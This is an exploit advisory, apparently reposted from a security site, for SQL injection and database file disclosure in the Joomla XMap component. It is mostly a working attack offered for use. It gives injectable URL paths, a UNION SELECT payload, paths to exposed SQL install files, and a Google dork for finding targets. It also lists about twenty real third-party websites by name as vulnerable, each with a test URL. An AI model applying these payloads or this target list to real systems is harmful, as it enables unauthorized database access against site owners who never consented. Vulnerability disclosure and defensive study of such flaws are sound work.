Joomla XMap Components 2.3.0 SQL Injection / Database Disclosure

2019.01.30
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

#################################################################### # Exploit Title : Joomla XMap Components 2.3.0 SQL Injection / Database Disclosure # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 30/01/2019 # Vendor Homepage : joomla.org # Software Download Links : joomla4ever.org/archive/ext/com_xmap.zip joomlacode.org/gf/project/xmap/frs/?action=FrsReleaseBrowse&frs_package_id=3882 rsjoomla.com/support/documentation/rsblog-/plugins-and-modules/xmap-plugin.html # Software Information Link : joomla4ever.org/extensions/ext-xmap # Software Versions : 1.2.7 / 2.3.0 and other versions # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : inurl:''/index.php?option=com_xmap'' # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] CWE-200 [ Information Exposure ] # Similar but for old Version CVE : cvedetails.com/cve/CVE-2010-2678/ - CVE-2010-2678 Note : Keep in mind. This Exploit/Vuln has been told in more details. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos #################################################################### # Description about Software : *************************** "XMAP" is open source software for Joomla. #################################################################### # Impact : *********** * SQL injection vulnerability in xmap (com_xmap) component for Joomla! allows remote attackers to execute arbitrary SQL commands via the Itemid parameter to index.php. * Successful exploitation will let attackers to manipulate SQL queries by injecting arbitrary SQL code. * The flaw is due to input passed via 'view=' and 'Itemid=' parameter to 'index.php' is not properly sanitised before being used in a SQL query. #################################################################### # SQL Injection Exploit : ********************** /index.php?option=com_xmap&Itemid=[SQL Injection] /index.php?option=com_xmap&sitemap=[ID-NUMBER]&Itemid=[SQL Injection] /index.php?option=com_xmap&tmpl=component&Itemid=[ID-NUMBER]&view=[SQL Injection] /index.php?option=com_xmap&view=html&id=[ID-NUMBER]&Itemid=[SQL Injection] # Exploit Payload : ***************** -1 UNION SELECT 1,2,3,version(),5,6,7,8-- #################################################################### # Database Disclosure Exploit : **************************** /administrator/components/com_xmap/install/install.postgresql.sql /administrator/components/com_xmap/install/install.utf8.sql /administrator/components/com_xmap/install/uninstall.postgresql.sql /administrator/components/com_xmap/install/uninstall.utf8.sql #################################################################### # Example Vulnerable Sites : ************************* [+] sab-uae.com/web/administrator/components/com_xmap/install/install.utf8.sql [+] didasconline.it/didasco/index.php?option=com_xmap&sitemap=1&Itemid=6%27 [+] beta.systemsvalley.com/index.php?option=com_xmap&view=html&id=1&Itemid=318%27 [+] agenda21.waw.pl/index.php?option=com_xmap&sitemap=1&Itemid=52%27 [+] arcoeste.it/portale/index.php?option=com_xmap&sitemap=1&Itemid=95%27 [+] old.bit-karton.ru/index.php?option=com_xmap&view=html&id=0&Itemid=173%27 [+] thscleaning.co.uk/index.php?option=com_xmap&sitemap=1&Itemid=8%27 [+] emmekappa.eu/index.php?option=com_xmap&view=html&id=1&Itemid=155%27 [+] ortopedie-mangalia.ro/index.php?option=com_xmap&sitemap=1&Itemid=8%27 [+] atabeh.ps/index.php?option=com_xmap&sitemap=1&Itemid=51%27 [+] acmu.fr/index.php?option=com_xmap&Itemid=124%27 [+] solardid.com/index.php?option=com_xmap&sitemap=1&Itemid=9%27 [+] serviceairtunisia.com/index.php?option=com_xmap&sitemap=1&Itemid=30%27 [+] cprsanmiguel.com/index.php?option=com_xmap&sitemap=1&Itemid=65%27 [+] arrozsonora.com.co/index.php?option=com_xmap&sitemap=1&Itemid=9%27 [+] annegil.crouzevialle.free.fr/index.php?option=com_xmap&sitemap=1&Itemid=43%27 [+] truongsonfurniture.com/index.php?option=com_xmap&view=html&id=1&Itemid=137%27 [+] apedema.org.br/index.php?option=com_xmap&sitemap=1&Itemid=17%27 [+] garagepiccina.ch/index.php?option=com_xmap&sitemap=1&Itemid=15%27 #################################################################### # Example SQL Database Error : **************************** Strict Standards: Declaration of JCacheControllerPage::store() should be compatible with JCacheController::store($data, $id, $group = NULL) in /home /systemsvalley/subdomains/beta.systemsvalley.com/libraries /joomla/cache/controller/page.php on line 0 Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /htdocs/public/www/configuration.php:1) in /htdocs/public/www/libraries/joomla/session/session.php on line 413 #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top